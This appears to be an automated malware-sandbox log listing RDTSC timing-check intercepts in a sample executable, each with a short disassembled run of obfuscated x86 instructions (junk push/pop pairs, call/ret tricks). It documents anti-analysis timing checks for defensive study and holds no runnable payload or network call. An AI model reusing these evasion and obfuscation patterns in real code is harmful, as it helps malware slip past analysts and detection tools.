Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44E879 second address: 44E883 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44E935 second address: 44E93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44E93E second address: 44E942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44F970 second address: 44F9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F65161h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D344Dh] 0x00000014 jmp 00007F6BF4F6515Ch 0x00000019 push 00000000h 0x0000001b movzx edi, cx 0x0000001e pushad 0x0000001f mov dword ptr [ebp+12454A40h], eax 0x00000025 mov edi, dword ptr [ebp+122D355Fh] 0x0000002b popad 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D23D4h], esi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 44F9BD second address: 44F9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4507BD second address: 45080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+12481EA7h], esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 sbb edi, 30B6E941h 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a mov di, bx 0x0000001d xchg eax, esi 0x0000001e jmp 00007F6BF4F65164h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 jmp 00007F6BF4F65168h 0x0000002c pop edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 45178E second address: 451795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 451966 second address: 45196B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 45281F second address: 452823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 452823 second address: 452829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 451A22 second address: 451A2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 453847 second address: 453851 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6BF4F65156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 453851 second address: 45385B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6BF4B2C356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 45385B second address: 45385F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4565EC second address: 45664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D3735h] 0x0000000f mov edi, dword ptr [ebp+122D3937h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F6BF4B2C358h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 movzx edi, di 0x00000034 push 00000000h 0x00000036 jmp 00007F6BF4B2C368h 0x0000003b mov bh, al 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jns 00007F6BF4B2C356h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 455854 second address: 455859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 404B2E second address: 404B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 45F615 second address: 45F625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F6BF4F65156h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46561F second address: 465623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 465623 second address: 465632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 465632 second address: 465637 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46574F second address: 46578B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6BF4F65156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6BF4F65163h 0x00000010 jne 00007F6BF4F65156h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F6BF4F6515Bh 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46578B second address: 4657A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F6BF4B2C356h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6BF4B2C35Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 465875 second address: 465879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 465879 second address: 46587D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46ABF5 second address: 46AC17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6BF4F65160h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jo 00007F6BF4F65156h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46AC17 second address: 46AC47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C368h 0x00000007 jg 00007F6BF4B2C356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jng 00007F6BF4B2C356h 0x00000016 pop ecx 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46A7BC second address: 46A7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6BF4F65156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 46A7C6 second address: 46A7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 470E0F second address: 470E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 470F3F second address: 470F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47109C second address: 4710A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47135A second address: 47136D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6BF4B2C35Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47136D second address: 471393 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6BF4F65169h 0x00000008 jl 00007F6BF4F65156h 0x0000000e jmp 00007F6BF4F6515Dh 0x00000013 pushad 0x00000014 je 00007F6BF4F65156h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4714C0 second address: 4714C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4714C6 second address: 4714CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47176B second address: 47178D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C367h 0x00000007 pushad 0x00000008 jl 00007F6BF4B2C356h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 424CC5 second address: 424CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 424CCE second address: 424CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47059A second address: 4705A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6BF4F65156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4705A9 second address: 4705AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4705AF second address: 4705B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4773F8 second address: 477409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6BF4B2C356h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47757D second address: 47759B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F65168h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477B4B second address: 477B5F instructions: 0x00000000 rdtsc 0x00000002 je 00007F6BF4B2C356h 0x00000008 jnp 00007F6BF4B2C356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477B5F second address: 477B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477B63 second address: 477B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477E40 second address: 477E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477E46 second address: 477E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477E4D second address: 477E57 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6BF4F65162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 477E57 second address: 477E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47839C second address: 4783A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4783A4 second address: 4783C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F6BF4B2C35Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4783C1 second address: 4783C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47C118 second address: 47C153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F6BF4B2C35Ah 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push esi 0x00000015 jmp 00007F6BF4B2C366h 0x0000001a jne 00007F6BF4B2C356h 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47C153 second address: 47C157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47F892 second address: 47F896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47F896 second address: 47F8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6BF4F65156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f jne 00007F6BF4F65156h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop eax 0x00000018 jnc 00007F6BF4F65158h 0x0000001e js 00007F6BF4F6515Ch 0x00000024 jl 00007F6BF4F65156h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e je 00007F6BF4F65156h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47F8CC second address: 47F8D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43E9AC second address: 43E9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F6BF4F65165h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43E9E0 second address: 43E9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43E9E6 second address: 43E9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43EB5B second address: 43EB69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F6BF4B2C356h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43EEE4 second address: 43EF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D3B4Bh] 0x00000011 push 0000001Eh 0x00000013 nop 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F6BF4F6515Dh 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e pushad 0x0000001f js 00007F6BF4F65156h 0x00000025 push edi 0x00000026 pop edi 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43EF26 second address: 43EF30 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F1B7 second address: 43F1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F1BB second address: 43F223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007F6BF4B2C356h 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 call 00007F6BF4B2C369h 0x00000017 call 00007F6BF4B2C361h 0x0000001c adc ch, FFFFFF84h 0x0000001f pop edx 0x00000020 pop ecx 0x00000021 lea eax, dword ptr [ebp+12482EB0h] 0x00000027 mov di, cx 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007F6BF4B2C369h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F223 second address: 43F265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D371Bh], esi 0x00000011 lea eax, dword ptr [ebp+12482E6Ch] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F6BF4F65158h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push edx 0x00000032 xor edx, dword ptr [ebp+122D371Bh] 0x00000038 pop edx 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 43F265 second address: 424CC5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6BF4B2C356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+1245467Eh], ebx 0x00000014 call dword ptr [ebp+122D37C2h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47FBAA second address: 47FBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47FBAE second address: 47FBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47FBC6 second address: 47FBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F6BF4F6515Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47FBDD second address: 47FBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 47FEA6 second address: 47FEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 480403 second address: 48040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 48040E second address: 480414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 480414 second address: 48041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4805BE second address: 4805C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4861AC second address: 4861C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C366h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4861C8 second address: 4861CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4892AA second address: 4892E1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6BF4B2C375h 0x00000008 jmp 00007F6BF4B2C369h 0x0000000d je 00007F6BF4B2C356h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F6BF4B2C35Ch 0x0000001d ja 00007F6BF4B2C356h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 4892E1 second address: 4892F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488AE9 second address: 488B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6BF4B2C356h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F6BF4B2C369h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6BF4B2C368h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488B30 second address: 488B3C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6BF4F65156h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488B3C second address: 488B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488CC2 second address: 488CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 488CC6 second address: 488CDD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6BF4B2C356h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007F6BF4B2C356h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
